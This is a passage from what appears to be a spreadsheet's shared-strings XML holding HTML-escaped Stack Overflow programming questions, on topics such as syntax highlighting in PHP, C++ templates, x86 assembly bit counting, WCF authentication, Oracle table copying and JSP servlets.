&lt;p&gt;So far, I'm stuck with &lt;a href="http://qbnz.com/highlighter/"&gt;GeSHi&lt;/a&gt;. Unfortunately, GeSHi fails abysmally for several reasons. The main reason is that the different language files define completely different, inconsistent styles. I've worked hours trying to refactor the different language definitions down to a common denominator but since most definition files are in themselves quite bad, I'd finally like to switch.&lt;/p&gt;
&lt;p&gt;Ideally, I'd like to have an API similar to &lt;a href="http://coderay.rubychan.de/"&gt;CodeRay&lt;/a&gt;, &lt;a href="http://pygments.org/"&gt;Pygments&lt;/a&gt; or the JavaScript &lt;a href="http://code.google.com/p/syntaxhighlighter/"&gt;dp.SyntaxHighlighter&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Clarification:&lt;/h2&gt;
&lt;p&gt;I'm looking for a code highlighting software written &lt;em&gt;in&lt;/em&gt; PHP, not &lt;em&gt;for&lt;/em&gt; PHP (since I need to use it from inside PHP).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any good "contact us" recipes for Cherrypy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to implement a "Contact Us" form with Cherrypy and was wondering: Is there a good recipe (or a BSD licensed set of code) that I could use instead of reinventing the wheel?&lt;/p&gt;
&lt;p&gt;Ideally, this would be Cherrpy 3.1 compatible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a dynamic weather ticker to the webpage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All Weather Tickers I found are static and if the user wants to select a zip code it links you to a different page.&lt;/p&gt;
&lt;p&gt;Do you know any weather ticker that just gets the new info  in the same page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can initialization list in constructors be used in template classes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find that most books concerning C++ templates don't tell anything about whether it's possible or not to use initialization list in constructor of a template class.&lt;/p&gt;
&lt;p&gt;For example, I have code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template &amp;lt;class T&amp;gt;
class Stack {
    T* data;
    std::size_t count;
    std::size_t capacity;
    enum {INIT = 5};
public:
    Stack() {
        count = 0;
        capacity = INIT;
        data = new T [INIT];
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I replace the constructor with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Stack(): count(0), capacity(INIT), data(new T [INIT])
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Does foreach always create a copy on a none reference in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if PHP has this optimization built in.  Normally when you call foreach without using a reference it copies the passed array and operates on it.  What happens if the reference count to that array is only 1?&lt;/p&gt;
&lt;p&gt;Say for example if getData returns some array of data.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach(getData() as $data)
    echo $data;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since the array returned by getData() only has one reference shouldn't it just be used by reference and not copied first or does php not have this optimization?&lt;/p&gt;
&lt;p&gt;This seems like a simple optimization that could help a lot of badly written code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Window Handle and window dimension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The MFC application that i created is dialog based. Just one dialog thats all. How do I get the window handle to this window, while the application is performing the InitDialog. I need to find out its dimension as well. GetForegroundWindow not necessarily gives you the handle to this window that is loading up &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you write a non-recursive algorithm to calculate factorials?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would you write a non-recursive algorithm to compute &lt;code&gt;n!&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I have url_for use a prefix option in Ruby on Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a project I am working on, Apache is set up to only forward requests that come in as /prefix/* to mongrel. How can I tell ruby on rails to generate all URLs with that prefix? &lt;/p&gt;
&lt;p&gt;I have the routes set up for forward to the correct controller action by doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;map.connect 'sfc/:controller/:action'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that doesn't seem to affect the way that the url writer generates the URLs.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing a rails plugin from a Git repository</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to install &lt;a href="http://thoughtbot.com/projects/shoulda" rel="nofollow"&gt;Shoulda&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;script/plugin install git://github.com/thoughtbot/shoulda.git
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but all I get is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;removing: C:/Documents and Settings/Danny/My Documents/Projects/Ruby On Rails/_ProjectName_/vendor/plugins/shoulda/.git
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the &lt;code&gt;vender/plugins&lt;/code&gt; directory is empty. I have Rails 2.1.1 installed as a gem and have verified that 2.1.1 is loaded (using a puts inserted into config/boot.rb).  Any ideas about what's going on?&lt;/p&gt;
&lt;p&gt;(this is on a windows box)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find where my .Net app is leaking Windows handles?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a WinForms .Net app that runs over a lot of XPS documents (thousands) and during this run the number of handles (according sysinternals process monitor and task manager) increases by between 3-10 for each document. I heavily suspect that these are handles that are opened and not closed by the MS .Net XPS framework libraries but I can't track it down.&lt;/p&gt;
&lt;p&gt;Despite stepping through the code the handle count increases at different points during the same run. For example, one pass through the loop and the handle count will jump by 1 on one line and next time it might not, or it might jump by 2. So I suspect the XPS com components have a handle leak.&lt;/p&gt;
&lt;p&gt;Memory use is fine though, but if I keep exhausting handles like this then I'll crash the app and maybe the desktop.&lt;/p&gt;
&lt;p&gt;So far I have tried sysinternals process explorer to look at the handles but they are all marked as  with no more detail. Also used handle.exe from sysinternals and this does not show any significant different between a before, during and after snapshot.&lt;/p&gt;
&lt;p&gt;Any clues on how to track down where the handles are going? I think I'm going to have to simplify to a single threaded console app to test.&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
&lt;p&gt;Ryan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone used or written an Ant task to compile (Rhino) JavaScript to Java bytecode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to use the &lt;a href="https://developer.mozilla.org/en/Rhino_JavaScript_Compiler" rel="nofollow"&gt;Rhino JavaScript&lt;/a&gt; compiler to compile some JavaScript to .class bytecode files for use in a project. It seems like this should already exist, since there are groovyc, netrexxc, and jythonc tasks for Groovy, NetREXX(!) and Jython, respectively. Has anyone used or written such an Ant task, or can anyone provide some tips on how to write one?&lt;/p&gt;
&lt;p&gt;Ideally it would have some way to resolve dependencies among JavaScript or Java classes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Overriding CreateObject Function in VBScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Need help to figure out how to overide the default CreateObject() function in VBScript with my own.&lt;/p&gt;
&lt;p&gt;Basically the same exact thing as this example in VB6:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.darinhiggins.com/2007/08/22/TheVB6CreateObjectFunction.aspx" rel="nofollow"&gt;http://www.darinhiggins.com/2007/08/22/TheVB6CreateObjectFunction.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I just need to adapt this to work in VBScript. The only thing I cannot figure out is this line:&lt;/p&gt;
&lt;p&gt;VBA.CreateObject(Class$, ServerName$)&lt;/p&gt;
&lt;p&gt;How do I refer to "VBA" in VBSript?&lt;/p&gt;
&lt;p&gt;any help would be appreciated&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharepoint: Web Part vs. ASP.NET User Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When creating web parts for Sharepoint, is it better to create an actual web part, or is using and ASP.NET User Control (.ascx) just as good?&lt;/p&gt;
&lt;p&gt;I already know how to create the user controls that I need, so it seems like the extra effort of creating a web part is just unnecessary leg work.&lt;/p&gt;
&lt;p&gt;What are the advantages of using a web part over just creating and ASP.NET user control?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to join another MySQL table when using Master/Detail Sample Form in Netbeans?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to implement an application by using MySQL/JAVA and I found this tool in netbeans to easily create a new form for an existing table. (edit, insert, delete etc.)
Is there an easy way to modify the code to join another table to display fields from that table.&lt;/p&gt;
&lt;p&gt;Example:
I have an employee table that has a foreign key TitleID and another table called Title that has TitleID and TitleName.
I want to display TitleName instead of TitleID in the master table employee.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you compress objects stored in session / cache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Scott Hanselman recently posted a &lt;a href="http://www.hanselman.com/blog/TheWeeklySourceCode35ZipCompressingASPNETSessionAndCacheState.aspx" rel="nofollow"&gt;blog article&lt;/a&gt; describing how to compress strings stored in the session / cache.  This looks fairly promising, but the majority of data that I am storing in the session / cache are not strings but custom classes.  How would you go about compressing these?&lt;/p&gt;
&lt;p&gt;My initial thought would be to utilize the BinaryFormatter to serialize the object first (just like the ASP.NET framework would do normally when storing custom class objects into the session / cache), then compress the resulting byte array.  However, this has the adverse side effect that the retrieved data from the session / cache would be readonly (since decompressing and deserializing would create a new in-memory object).&lt;/p&gt;
&lt;p&gt;In other words, if my code currently looks like the following, is there a way to compress its storage into the session?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyClass foo = new MyClass();
Session["foo"] = foo;
MyClass retrievedFoo1 = (MyClass) Session["foo"];
retrievedFoo1.Property1 = "property 1";
// retrievedFoo2.Property1 should equal "property 1"!
MyClass retrievedFoo2 = (MyClass) Session["foo"];
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What does a type followed by _t (underscore-t) represent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This seems like a simple question, but I can't find it with the Stack Overflow search or Google. What does a type followed by a &lt;code&gt;_t&lt;/code&gt; mean? Such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int_t anInt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I see it a lot in C code meant to deal closely with hardwareâ€”I can't help but think that they're related.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET compact framework and ActiveSync</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way that my .NET CF app running on a Windows CE device can know when the device is docked/synced with the PC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Force windows to refresh a disk FAT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a separate partition on my disk formatted with FAT32. When I hibernate windows, I want to be able to load another OS, create/modify files that are on that partition, then bring Windows out of hibernation and be able to see the changes that I've made.&lt;/p&gt;
&lt;p&gt;I know what you're going to type, "Well, you're not supposed to do that!" and then link me to some specs about how what I'm trying to do is wrong/impossible/going to break EVERYTHING. However, I'm sure there's some way I can get around that. :)&lt;/p&gt;
&lt;p&gt;I don't need the FAT32 partition in Windows, except to read the files that were written there, then I'm done - so whatever the solution is, it's acceptable for the disk to be completely inaccessible for a period of time. Unfortunately, I can't take the entire physical disk offline because it is just a partition of the same physical device that windows is installed on -- just the partition.&lt;/p&gt;
&lt;p&gt;These are the things I've tried so far...&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Google it. I got at least one "this is NEVER going to happen" answer. Unacceptable! :)&lt;/li&gt;
&lt;li&gt;Unmount the disk before hibernating. Mount after coming out of hibernation. This seems to have no effect. Windows still thinks the FAT is the same as it was before, so whatever data I wrote to disk is lost, and any files I resized are corrupted. If any of the file was cached, it's even worse.&lt;/li&gt;
&lt;li&gt;Use DeviceIoControl to call IOCTL_DISK_UPDATE_PROPERTIES to try and refresh the disk (but the partition table hasn't changed, so this doesn't really do anything).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there any way to invalidate the disk/volume read cache to force windows to go back to the disk? &lt;/p&gt;
&lt;p&gt;I thought about opening the partition and reading/writing directly by using libfat and bypassing the cache or something is overkill.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint - ASP.Net Controls Integration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have basically two separate sites, a SharePoint collaboration site, and an ASP.Net application site. The only linkage between the two are the hyperlinks going back and forth, and the user validation on the behalf of the SharePoint site. The user will enter and be authenticated through the SharePoint site and then may browse to the ASP.Net application.&lt;/p&gt;
&lt;p&gt;What is the best way to integrate the two sites together? Is there an easy way to give the users a seamless experience while maintaining two sites?&lt;/p&gt;
&lt;p&gt;UPDATE: I followed all of your advice and settled on going with Chris' answer.&lt;/p&gt;
&lt;p&gt;Andrew Connel actually deploys the .aspx code behind pages as a SharePoint feature.&lt;/p&gt;
&lt;p&gt;He sets out how to do this on his site &lt;a href="http://www.andrewconnell.com/blog/articles/UsingCodeBehindFilesInSharePointSites.aspx" rel="nofollow"&gt;here.&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you Manage Infragistics WebGrid Data from JavaScript/Ajax code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a project that I need to use the Infragistics WebGrid control for some lists of data. I am loading the data on the client-side using JavaScript for display on a Map, and then I need to display that same data within multiple WebGrids. All the data available will be displayed in the WebGrids, but only a subset of the data (only that which is currently within view) will be plotted on the Map at any given time. Since I am loading the data using JavaScript/Ajax, I would like to only load it once, and use the same mechanism to populate the WebGrid control with data too.&lt;/p&gt;
&lt;p&gt;Does anyone have any tips/pointers on working with the WebGrid completely from within client-side JavaScript/Ajax code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Parent class calling a child virtual function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want a pure virtual parent class to call a child implementation of a function like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class parent
{
  public:
    void Read() { //read stuff }
    virtual void Process() = 0;
    parent() 
    {
        Read();
        Process();
    }
}
class child : public parent
{
  public:
    virtual void Process() { //process stuff }
    child() : parent() { }
}
int main()
{
   child c;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should work, but I get an unlinked error :/ This is using VC++ 2k3&lt;/p&gt;
&lt;p&gt;Or shouldn't it work, am I wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image Slider with Silverlight</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a requirement of creating an Image slider using Silverlight. I need to display 5 images at first. There will be two buttons previous and next. When I'll click the next button another new 5 images will be shown in place of previously diplayed images. Would it be possible for anyone to tell me the solution for this? &lt;/p&gt;
&lt;p&gt;Someone please help me.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extra backslashes being added in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My &lt;sub&gt;crappy&lt;/sub&gt; web host did some upgrades the other day and some settings have gone awry, because looking at our company's wiki (MediaWiki), every quote is being escaped with a backslashes. It's not even just data which is being posted (ie: the articles) which are affected, but also the standard MediaWiki text. eg:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;You\'ve followed a link to a page that doesn\'t exist yet. To create the page, start typing in the box below (see the help page for more info). If you are here by mistake, just click your browser\'s \'\'\'back\'\'\' button. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The first thing I did was disable &lt;code&gt;magic_quotes_gpc&lt;/code&gt; AND &lt;code&gt;magic_quotes_runtime&lt;/code&gt; using a &lt;code&gt;.htaccess&lt;/code&gt; file, but this is still occurring. My &lt;code&gt;php_info()&lt;/code&gt; reports this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Setting             Local Value   Master Value  
magic_quotes_gpc        Off            On  
magic_quotes_runtime    Off            On  
magic_quotes_sybase     Off            Off
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>looking at client controls on the server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just starting out with the whole ajax thing and I need some help.  I have a form where the users will have the ability to add multiple e-mail addresses to a record.  When the user clicks add a new e-mail address, I am going to perform an ajax call that will insert the email address and then get the current e-mails to be displayed for editing.  Sounds fine, but the only problem I have is when the form submits I want to be able to access those values server side, as well as store the sequence numbers from the db so the emails can be updated on the final submit.  In a repeater, I'd store the sequence number in a hidden field and then loop through the items, but I can't do that when I'm not using a repeater.  I'd like to avoid using the update panel because of the large network traffic.  I suppose I could use request.forms collection, but how would I store the sequence numbers in such a way that the users couldn't see them?  Am I totally off base?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>x86 question about bit comparisons</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im having a problem with a final part of my assignment. We get in a stream of bits, etc etc, in the stream is an integer with the number of 1's in the text portion. I get that integer and its 24 which is correct, now i loop through the text data i get and i try to count all the 1's in there. But my proc is always returning zero.&lt;/p&gt;
&lt;p&gt;I was able to make sure it was looping properly and it is.&lt;/p&gt;
&lt;p&gt;The text = Hello
which is 16 1's, here is my proc for looping through that text to count the number of ones in it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sub 	AX,AX
sub		SI,SI
mov		bx,[bp+6]		;get message offset    
@@mainLoop:
	mov		cx,8
	mov		dh,80h
	cmp		byte ptr [bx + si],0
	je		@@endChecker
@@innerLoop:
	test	byte ptr [bx + si],dh
	jz		@@zeroFound
	inc		AX
	@@zeroFound:
		shr		bh,1
		loop	@@innerLoop		
	@@continue:
		inc		si
		jmp		@@mainLoop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the rest of the proc is just push/pops. What im wanting this to actually do is use TEST to compare 100000000 to a byte, if its a 1 inc AX else shift right the mask by 1 and loop a whole byte, than inc to next byte and do again.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Applications using Decimal versus double . . </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wanted to see if folks were using decimal for financial applications instead of double.  I have seen lots of folks using double all over the place with unintended consequences . .&lt;/p&gt;
&lt;p&gt;Do you see others making this mistake . . .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to configure security when calling WCF Service from .Net 2.0 Client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WCF service up and running and am able to communicate between the service and a .Net 2.0 Client using basicHttpBinding.  &lt;/p&gt;
&lt;p&gt;I now need to lock down the WCF service so that it can only be called by authenticated clients.&lt;/p&gt;
&lt;p&gt;I have control over the clients that will be calling my service. The clients are part of a product that will be installed in the wild and "phoning home" to push and pull data.  The client app is written for .Net 2.0 framework and cannot be upgraded to 3.0 or 3.5 at this time.  I cannot add windows user accounts to the client machines.&lt;/p&gt;
&lt;p&gt;What are my options for securing the WCF Service and being able to authenticate from my .Net 2.0 clients?  Also, data needs to be passed over https.&lt;/p&gt;
&lt;p&gt;I've been searching the web, and feel like I'm on a wild goose chase.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to backup project folders to local desktop if path more than 255 characters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For e.g. if i am storing some files on a network server which is under many hierarchical folders.&lt;/p&gt;
&lt;p&gt;Then i want to do backup. But i always encounter issue because the file path is more than 255?&lt;/p&gt;
&lt;p&gt;How can i resolve this issue or work around it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>removing password for multiple PDF files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;so I have a huge collection of PDF files that I need to extract text from.
The files are encrypted, but I know the password for them. I'm looking for a way to automate the process of extracting the text.&lt;br&gt;&lt;br&gt;
I can manually open the file in Acrobat professional, remove security by typing in the password, and then save as .txt file. But there's no way to automate that with batch processing for the 600 files.&lt;br&gt;&lt;br&gt;
I'm looking for a some tool to help with this. I'm good with Perl, so I tried the various PDF handling modules from CPAN, but they're failing to read the encrypted documents. Anyone has any solution for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse: Hide paths in the "Open resource" dialog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to define what the "Open Resource" dialog in Eclipse should show?&lt;/p&gt;
&lt;p&gt;If you work with svn you don't want the *.svn files to show up. (I know there is a fix out for this one but does there exist a more general one?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the impact of virtualisation on cryptographically strong random number generators?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;/dev/random and /dev/urandom use environmental noise to generate randomness. &lt;/p&gt;
&lt;p&gt;With a virtualised server there can be multiple instances of an Operating System on one hardware configuration. These operating systems will all be sourcing their randomness from the same environmental noise.&lt;/p&gt;
&lt;p&gt;Does this mean as a group the random number generators strength is reduced as all OS instances are basing their calculations of the same input? Or, is the environmental noise partitioned out so that sharing doesn't occur?&lt;/p&gt;
&lt;p&gt;If the latter is true, I can see this reducing the effectiveness of /dev/urandom because it reuses its internal pool and with less environmental input, reduces entropy.&lt;/p&gt;
&lt;p&gt;/dev/random should be ok because it blocks until enough noise is acquired... unless of course the OS instances are all sharing the input.&lt;/p&gt;
&lt;p&gt;So, the question: What is the impact of virtualisation on cryptographically strong random number generators, specifically those that use environmental noise?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cannot import SQLite with Python 2.6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running Python 2.6 on Unix and when I run the interactive prompt (&lt;a href="http://en.wikipedia.org/wiki/SQLite"&gt;SQLite&lt;/a&gt; is supposed to be preinstalled) I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[root@idev htdocs]# python
Python 2.6 (r26:66714, Oct 23 2008, 16:25:34)
[GCC 3.2.2 20030222 (Red Hat Linux 3.2.2-5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
&amp;gt;&amp;gt;&amp;gt; import sqlite
Traceback (most recent call last):
File "&amp;lt;stdin&amp;gt;", line 1, in &amp;lt;module&amp;gt;
ImportError: No module named sqlite
&amp;gt;&amp;gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I resolve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much a tester should know about internal details of code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How useful, if at all, is for the testers on a product team to know about the internal code details of a product. This does not mean they need to know every line of code but a good idea of how the code is structured, what is the object model, how the various modules are inter-linked, what are the inter-dependencies between various features etc.? This can argubaly help them in finding related issues or defects once they hit one. On the other side, this can potentially 'bias' their "user-centric" approach towards evaluating and certifying the product and can effect the testing results in the end.&lt;/p&gt;
&lt;p&gt;I have not heard of any specific model for such interaction. (Lets assume a product that users, potentially non-technical consume, and not a framework or API that the testers are testing - in the latter case the testers may need to understand the code to test that because the user is another programmer). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need to Impersonate user forAccessing Network resource, Asp.Net Account</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to access a network resource on which only a given Domain Account has access.
I am using the LogonUser call, but get a "User does not have required priviliege" exception, as the web application is running with the asp.net account and it does not have adequate permissions to make this call.&lt;/p&gt;
&lt;p&gt;Is there a way to get around it?
Changing the identity or permissions of the ASP.Net account is not an option as this is a production machine with many projects running.
Is there a better way to achieve this?&lt;/p&gt;
&lt;p&gt;Using Asp.Net 2.0, Forms Authentication.&lt;/p&gt;
&lt;p&gt;Kind Regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What technique would be the least effort to internationalise (at least multi-language) existing Delphi Applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed about 300 Applications which I would like to provide with multi-language capabilities independent from the Operating System. I have written a just-in-time translator, but that is too slow in applications with many components. What would you suggest I do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Graphical Subsystem for Touchscreen Kiosk Development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a hobby project in which I would like to have a graphical, touchscreen interface for interacting with a kiosk-like device running on top of Windows XP Embedded.  For development of a rich UI experience, I was considering using WPF.  However, a number of demonstration videos that I have come across have used Silverlight, while I haven't seen a single WPF demonstration.&lt;/p&gt;
&lt;p&gt;It was my understanding that Silverlight was targeted towards website developers, while WPF was more targeted towards desktop development.&lt;/p&gt;
&lt;p&gt;So this question has two parts.  Firstly, what is the recommended graphical subsystem for development of a rich UI experience on a kiosk-like device hosted on the Windows XP embedded platform?  Secondly, if it is Silverlight, which version is suggested (1.0 or 2.0) and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Domain redirection to the same page and Google</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We developed a website for a client and he has purchased the .com, .net, .info versions of the domain.&lt;/p&gt;
&lt;p&gt;Is there any way to redirect all to the same page without being considered by Google as duplicated content and therefore penalized in the ranking position?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Beta testing a new product</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a Micro ISV I am coming to the stage in the development of a new desktop software application where beta testing it with an external group of users would be great.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;I would prefer private invite only beta testing as opposed to public free for all beta testing.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Are there websites/organisations, both free or paid, where I can 'reach out' to people (with some degree of selectivity) who want to test software and provide feedback/bug reports and so on?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What have other people done when beta testing their products?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;UPDATE: I came across &lt;a href="http://www.trybeta.com/login/index.php" rel="nofollow"&gt;TryBeta&lt;/a&gt; which looks interesting (Although activity on the website seems to have ended around 2007).&lt;/p&gt;
&lt;p&gt;With regard to turning testers into customers, I am not too concerned with doing this at the moment. Advertising towards the target audience to build up a customer base will be put in place at a later stage. Right now just testers, ideally managed by a third party website/organisation, would be ideal.&lt;/p&gt;
&lt;p&gt;Many thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Colorize logs in eclipse console</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to colorize parts of logs in the eclipse console.  I know I could send to error and standard streams and color them differently but I'm more looking someting in the lines of ANSI escape codes (or anyother, HTML ?) where I could embed the colors in the string to have it colored in the logs.&lt;/p&gt;
&lt;p&gt;It sure would help making the important bits stand out without resorting to weird layout, rather keep the layout to the log4j setups &lt;/p&gt;
&lt;p&gt;here is an example of what I am looking for :&lt;/p&gt;
&lt;p&gt;[INFO ] The grid is complete ....... &lt;strong&gt;false&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;where the bold parts would be in blue, this coloring can be controlled by the application to an extent.  like so (tags are conceptual and arbitrary, but you get the idea):&lt;/p&gt;
&lt;p&gt;log.info(String.format("The grid is complete ....... &lt;code&gt;&amp;lt;blue&amp;gt;&lt;/code&gt;%s&lt;code&gt;&amp;lt;/blue&amp;gt;&lt;/code&gt;", isComplete ));&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;On a more general note it is the ability to embed meta information in the logs to help the presentation of these logs.  Much like we tag web pages content to help the presentation of the information by CSS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tetris Piece Rotation Algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best algorithms (and explanations) for representing and rotating the pieces of a tetris game?  I always find the piece rotation and representation schemes confusing.&lt;/p&gt;
&lt;p&gt;Most tetris games seem to use a naive "remake the array of blocks" at each rotation:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.codeplex.com/Project/ProjectDirectory.aspx?ProjectSearchText=tetris"&gt;http://www.codeplex.com/Project/ProjectDirectory.aspx?ProjectSearchText=tetris&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;However, some use pre-built encoded numbers and bit shifting to represent each piece:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.codeplex.com/wintris"&gt;http://www.codeplex.com/wintris&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is there a method to do this using mathematics (not sure that would work on a cell based board)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a copy of an Oracle table without copying the data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know the statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;create table xyz_new as select * from xyz;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which copies the structure and the data, but what if I just want the structure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio solution that just points to a folder and shows all sub-folders and files in the solution explorer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to create a blank solution, or some type of file-based project solution within Visual Studio so that I can point to a root folder, and have all of the sub-folders and files in that root, show up in my solution explorer? I realize I can create a blank solution and then add the individual items manually by add &gt; existing item, however, this does not keep the folder structure intact, and, well, it would take forever if I have a lot of folders/files. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass parameter to servlet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I pass a parameter from a page's useBean in JSP to a servlet in Java? I have some data in a form that gets passed no problem with a submit button, but no way to send anything else. Please help? Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input name = "deleteGameButton" type = "submit" value = "Delete"
 onclick = "submitToServlet('DeleteGameServlet');"&amp;gt;
